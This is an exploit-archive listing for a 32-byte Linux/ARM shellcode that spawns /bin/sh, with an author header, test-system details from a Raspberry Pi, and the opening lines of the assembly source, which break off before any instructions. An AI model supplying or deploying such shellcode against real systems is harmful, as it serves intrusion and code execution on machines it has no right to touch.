Exploits / Vulnerability Discovered : 2018-08-29 |
Type : shellcode |
Platform : arm
This exploit / vulnerability Linux/arm execve("/bin/sh", ["/bin/sh"], null) shellcode (32 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
Title: Linux/ARM - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode (32 Bytes)
Date: 2018-08-16
Tested: armv7l (Raspberry Pi 3 Model B+)
Author: Ken Kitahara
pi@raspberrypi:~ $ uname -a
Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
pi@raspberrypi:~ $ lsb_release -a
No LSB modules are available.
Distributor ID: Raspbian
Description: Raspbian GNU/Linux 9.4 (stretch)
Release: 9.4
Codename: stretch
pi@raspberrypi:~ $ cat binsh.s
.section .text
.global _start